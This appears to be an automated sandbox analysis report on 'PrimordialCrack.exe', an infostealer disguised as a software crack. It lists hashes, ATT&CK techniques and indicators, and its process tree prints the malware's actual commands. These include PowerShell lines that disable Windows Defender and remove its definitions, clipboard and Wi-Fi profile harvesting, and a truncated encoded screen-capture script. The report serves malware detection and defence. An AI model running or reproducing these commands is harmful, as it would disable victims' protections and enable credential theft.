801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793

Analysis

max time kernel
146s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PrimordialCrack.exe
Size

7.5MB
MD5

0738a5a832b62e68a740aa3401d332ef
SHA1

3f3b0acdc4cc580de58495ca3b5a2aa305362825
SHA256

801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793
SHA512

0f008f61aa87d1efb5c83f1bf701112565aee0b2991645e36e0e10d0aa415e9b8ed9972bf847cba90bfd2549d1233599b6c9adc174e354e181d267cbe51429ce
SSDEEP

196608:wct1WurErvI9pWjgaAnajMsK2CfQCS/OinHC1e:dt1WurEUWjJjYRoPhHYe

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1464	powershell.exe
400	powershell.exe
448	powershell.exe
1388	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3324	powershell.exe
4748	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4644	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe
852	PrimordialCrack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	discord.com
30	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3012	tasklist.exe
3064	tasklist.exe
1532	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c11-21.dat	upx
behavioral2/memory/852-25-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp	upx
behavioral2/files/0x0008000000023bd0-27.dat	upx
behavioral2/files/0x0008000000023c0f-29.dat	upx
behavioral2/memory/852-30-0x00007FFC06130000-0x00007FFC06155000-memory.dmp	upx
behavioral2/memory/852-41-0x00007FFC0AFE0000-0x00007FFC0AFEF000-memory.dmp	upx
behavioral2/files/0x0008000000023c07-48.dat	upx
behavioral2/files/0x0008000000023c06-47.dat	upx
behavioral2/files/0x0008000000023c05-46.dat	upx
behavioral2/files/0x0008000000023bd6-45.dat	upx
behavioral2/files/0x0008000000023bd5-44.dat	upx
behavioral2/files/0x0008000000023bd4-43.dat	upx
behavioral2/files/0x0008000000023bd3-42.dat	upx
behavioral2/files/0x000e000000023bce-40.dat	upx
behavioral2/files/0x0008000000023c2c-39.dat	upx
behavioral2/files/0x0008000000023c2b-38.dat	upx
behavioral2/files/0x0008000000023c2a-37.dat	upx
behavioral2/files/0x0008000000023c10-34.dat	upx
behavioral2/files/0x0008000000023c0a-33.dat	upx
behavioral2/memory/852-54-0x00007FFC02A30000-0x00007FFC02A5D000-memory.dmp	upx
behavioral2/memory/852-56-0x00007FFC08110000-0x00007FFC0812A000-memory.dmp	upx
behavioral2/memory/852-58-0x00007FFC02A00000-0x00007FFC02A24000-memory.dmp	upx
behavioral2/memory/852-60-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp	upx
behavioral2/memory/852-62-0x00007FFC029A0000-0x00007FFC029B9000-memory.dmp	upx
behavioral2/memory/852-64-0x00007FFC02990000-0x00007FFC0299D000-memory.dmp	upx
behavioral2/memory/852-66-0x00007FFC02950000-0x00007FFC02983000-memory.dmp	upx
behavioral2/memory/852-71-0x00007FFBF2210000-0x00007FFBF22DD000-memory.dmp	upx
behavioral2/memory/852-70-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp	upx
behavioral2/memory/852-74-0x00007FFC06130000-0x00007FFC06155000-memory.dmp	upx
behavioral2/memory/852-73-0x00007FFBF1CE0000-0x00007FFBF2209000-memory.dmp	upx
behavioral2/memory/852-76-0x00007FFC02100000-0x00007FFC02114000-memory.dmp	upx
behavioral2/memory/852-78-0x00007FFC02940000-0x00007FFC0294D000-memory.dmp	upx
behavioral2/memory/852-81-0x00007FFBF25E0000-0x00007FFBF26FB000-memory.dmp	upx
behavioral2/memory/852-80-0x00007FFC08110000-0x00007FFC0812A000-memory.dmp	upx
behavioral2/memory/852-84-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp	upx
behavioral2/memory/852-82-0x00007FFC02A00000-0x00007FFC02A24000-memory.dmp	upx
behavioral2/memory/852-199-0x00007FFC02950000-0x00007FFC02983000-memory.dmp	upx
behavioral2/memory/852-238-0x00007FFBF2210000-0x00007FFBF22DD000-memory.dmp	upx
behavioral2/memory/852-295-0x00007FFBF1CE0000-0x00007FFBF2209000-memory.dmp	upx
behavioral2/memory/852-341-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp	upx
behavioral2/memory/852-336-0x00007FFC06130000-0x00007FFC06155000-memory.dmp	upx
behavioral2/memory/852-335-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp	upx
behavioral2/memory/852-809-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp	upx
behavioral2/memory/852-952-0x00007FFC02A00000-0x00007FFC02A24000-memory.dmp	upx
behavioral2/memory/852-951-0x00007FFC08110000-0x00007FFC0812A000-memory.dmp	upx
behavioral2/memory/852-950-0x00007FFC02A30000-0x00007FFC02A5D000-memory.dmp	upx
behavioral2/memory/852-948-0x00007FFC0AFE0000-0x00007FFC0AFEF000-memory.dmp	upx
behavioral2/memory/852-947-0x00007FFC06130000-0x00007FFC06155000-memory.dmp	upx
behavioral2/memory/852-946-0x00007FFBF1CE0000-0x00007FFBF2209000-memory.dmp	upx
behavioral2/memory/852-937-0x00007FFBF25E0000-0x00007FFBF26FB000-memory.dmp	upx
behavioral2/memory/852-936-0x00007FFC02940000-0x00007FFC0294D000-memory.dmp	upx
behavioral2/memory/852-935-0x00007FFC02100000-0x00007FFC02114000-memory.dmp	upx
behavioral2/memory/852-921-0x00007FFBF2F70000-0x00007FFBF3635000-memory.dmp	upx
behavioral2/memory/852-932-0x00007FFBF2210000-0x00007FFBF22DD000-memory.dmp	upx
behavioral2/memory/852-931-0x00007FFC02950000-0x00007FFC02983000-memory.dmp	upx
behavioral2/memory/852-930-0x00007FFC02990000-0x00007FFC0299D000-memory.dmp	upx
behavioral2/memory/852-929-0x00007FFC029A0000-0x00007FFC029B9000-memory.dmp	upx
behavioral2/memory/852-928-0x00007FFBF2D30000-0x00007FFBF2EAE000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4852	cmd.exe
4616	netsh.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2088	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4960	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
448	powershell.exe
1464	powershell.exe
1464	powershell.exe
448	powershell.exe
448	powershell.exe
3324	powershell.exe
3324	powershell.exe
1464	powershell.exe
1464	powershell.exe
3324	powershell.exe
3244	powershell.exe
3244	powershell.exe
3244	powershell.exe
1388	powershell.exe
1388	powershell.exe
4544	powershell.exe
4544	powershell.exe
4544	powershell.exe
400	powershell.exe
400	powershell.exe
400	powershell.exe
548	powershell.exe
548	powershell.exe
548	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	3012	tasklist.exe
Token: SeDebugPrivilege	3064	tasklist.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeIncreaseQuotaPrivilege	2468	WMIC.exe
Token: SeSecurityPrivilege	2468	WMIC.exe
Token: SeTakeOwnershipPrivilege	2468	WMIC.exe
Token: SeLoadDriverPrivilege	2468	WMIC.exe
Token: SeSystemProfilePrivilege	2468	WMIC.exe
Token: SeSystemtimePrivilege	2468	WMIC.exe
Token: SeProfSingleProcessPrivilege	2468	WMIC.exe
Token: SeIncBasePriorityPrivilege	2468	WMIC.exe
Token: SeCreatePagefilePrivilege	2468	WMIC.exe
Token: SeBackupPrivilege	2468	WMIC.exe
Token: SeRestorePrivilege	2468	WMIC.exe
Token: SeShutdownPrivilege	2468	WMIC.exe
Token: SeDebugPrivilege	2468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2468	WMIC.exe
Token: SeRemoteShutdownPrivilege	2468	WMIC.exe
Token: SeUndockPrivilege	2468	WMIC.exe
Token: SeManageVolumePrivilege	2468	WMIC.exe
Token: 33	2468	WMIC.exe
Token: 34	2468	WMIC.exe
Token: 35	2468	WMIC.exe
Token: 36	2468	WMIC.exe
Token: SeDebugPrivilege	1532	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2468	WMIC.exe
Token: SeSecurityPrivilege	2468	WMIC.exe
Token: SeTakeOwnershipPrivilege	2468	WMIC.exe
Token: SeLoadDriverPrivilege	2468	WMIC.exe
Token: SeSystemProfilePrivilege	2468	WMIC.exe
Token: SeSystemtimePrivilege	2468	WMIC.exe
Token: SeProfSingleProcessPrivilege	2468	WMIC.exe
Token: SeIncBasePriorityPrivilege	2468	WMIC.exe
Token: SeCreatePagefilePrivilege	2468	WMIC.exe
Token: SeBackupPrivilege	2468	WMIC.exe
Token: SeRestorePrivilege	2468	WMIC.exe
Token: SeShutdownPrivilege	2468	WMIC.exe
Token: SeDebugPrivilege	2468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2468	WMIC.exe
Token: SeRemoteShutdownPrivilege	2468	WMIC.exe
Token: SeUndockPrivilege	2468	WMIC.exe
Token: SeManageVolumePrivilege	2468	WMIC.exe
Token: 33	2468	WMIC.exe
Token: 34	2468	WMIC.exe
Token: 35	2468	WMIC.exe
Token: 36	2468	WMIC.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeIncreaseQuotaPrivilege	3244	WMIC.exe
Token: SeSecurityPrivilege	3244	WMIC.exe
Token: SeTakeOwnershipPrivilege	3244	WMIC.exe
Token: SeLoadDriverPrivilege	3244	WMIC.exe
Token: SeSystemProfilePrivilege	3244	WMIC.exe
Token: SeSystemtimePrivilege	3244	WMIC.exe
Token: SeProfSingleProcessPrivilege	3244	WMIC.exe
Token: SeIncBasePriorityPrivilege	3244	WMIC.exe
Token: SeCreatePagefilePrivilege	3244	WMIC.exe
Token: SeBackupPrivilege	3244	WMIC.exe
Token: SeRestorePrivilege	3244	WMIC.exe
Token: SeShutdownPrivilege	3244	WMIC.exe
Token: SeDebugPrivilege	3244	WMIC.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe
2740	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2740	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 32 wrote to memory of 852	32	PrimordialCrack.exe	84
PID 32 wrote to memory of 852	32	PrimordialCrack.exe	84
PID 852 wrote to memory of 2076	852	PrimordialCrack.exe	89
PID 852 wrote to memory of 2076	852	PrimordialCrack.exe	89
PID 852 wrote to memory of 5112	852	PrimordialCrack.exe	90
PID 852 wrote to memory of 5112	852	PrimordialCrack.exe	90
PID 2076 wrote to memory of 1464	2076	cmd.exe	93
PID 2076 wrote to memory of 1464	2076	cmd.exe	93
PID 5112 wrote to memory of 448	5112	cmd.exe	94
PID 5112 wrote to memory of 448	5112	cmd.exe	94
PID 852 wrote to memory of 1372	852	PrimordialCrack.exe	95
PID 852 wrote to memory of 1372	852	PrimordialCrack.exe	95
PID 852 wrote to memory of 3620	852	PrimordialCrack.exe	96
PID 852 wrote to memory of 3620	852	PrimordialCrack.exe	96
PID 852 wrote to memory of 5056	852	PrimordialCrack.exe	99
PID 852 wrote to memory of 5056	852	PrimordialCrack.exe	99
PID 852 wrote to memory of 4748	852	PrimordialCrack.exe	100
PID 852 wrote to memory of 4748	852	PrimordialCrack.exe	100
PID 1372 wrote to memory of 3064	1372	cmd.exe	103
PID 3620 wrote to memory of 3012	3620	cmd.exe	104
PID 1372 wrote to memory of 3064	1372	cmd.exe	103
PID 3620 wrote to memory of 3012	3620	cmd.exe	104
PID 852 wrote to memory of 3964	852	PrimordialCrack.exe	105
PID 852 wrote to memory of 3964	852	PrimordialCrack.exe	105
PID 852 wrote to memory of 2708	852	PrimordialCrack.exe	137
PID 852 wrote to memory of 2708	852	PrimordialCrack.exe	137
PID 4748 wrote to memory of 3324	4748	cmd.exe	108
PID 4748 wrote to memory of 3324	4748	cmd.exe	108
PID 852 wrote to memory of 4852	852	PrimordialCrack.exe	141
PID 852 wrote to memory of 4852	852	PrimordialCrack.exe	141
PID 5056 wrote to memory of 2468	5056	cmd.exe	139
PID 5056 wrote to memory of 2468	5056	cmd.exe	139
PID 852 wrote to memory of 3036	852	PrimordialCrack.exe	112
PID 852 wrote to memory of 3036	852	PrimordialCrack.exe	112
PID 852 wrote to memory of 556	852	PrimordialCrack.exe	115
PID 852 wrote to memory of 556	852	PrimordialCrack.exe	115
PID 3964 wrote to memory of 1532	3964	cmd.exe	118
PID 3964 wrote to memory of 1532	3964	cmd.exe	118
PID 2708 wrote to memory of 2480	2708	cmd.exe	145
PID 2708 wrote to memory of 2480	2708	cmd.exe	145
PID 4852 wrote to memory of 4616	4852	cmd.exe	120
PID 4852 wrote to memory of 4616	4852	cmd.exe	120
PID 3036 wrote to memory of 4960	3036	cmd.exe	121
PID 3036 wrote to memory of 4960	3036	cmd.exe	121
PID 556 wrote to memory of 3244	556	cmd.exe	158
PID 556 wrote to memory of 3244	556	cmd.exe	158
PID 852 wrote to memory of 4784	852	PrimordialCrack.exe	123
PID 852 wrote to memory of 4784	852	PrimordialCrack.exe	123
PID 4784 wrote to memory of 5008	4784	cmd.exe	125
PID 4784 wrote to memory of 5008	4784	cmd.exe	125
PID 852 wrote to memory of 5032	852	PrimordialCrack.exe	126
PID 852 wrote to memory of 5032	852	PrimordialCrack.exe	126
PID 5032 wrote to memory of 3096	5032	cmd.exe	128
PID 5032 wrote to memory of 3096	5032	cmd.exe	128
PID 852 wrote to memory of 3776	852	PrimordialCrack.exe	129
PID 852 wrote to memory of 3776	852	PrimordialCrack.exe	129
PID 3244 wrote to memory of 732	3244	powershell.exe	131
PID 3244 wrote to memory of 732	3244	powershell.exe	131
PID 3776 wrote to memory of 536	3776	cmd.exe	132
PID 3776 wrote to memory of 536	3776	cmd.exe	132
PID 852 wrote to memory of 3200	852	PrimordialCrack.exe	146
PID 852 wrote to memory of 3200	852	PrimordialCrack.exe	146
PID 3200 wrote to memory of 1904	3200	cmd.exe	135
PID 3200 wrote to memory of 1904	3200	cmd.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe
"C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:32
- C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe
  "C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAb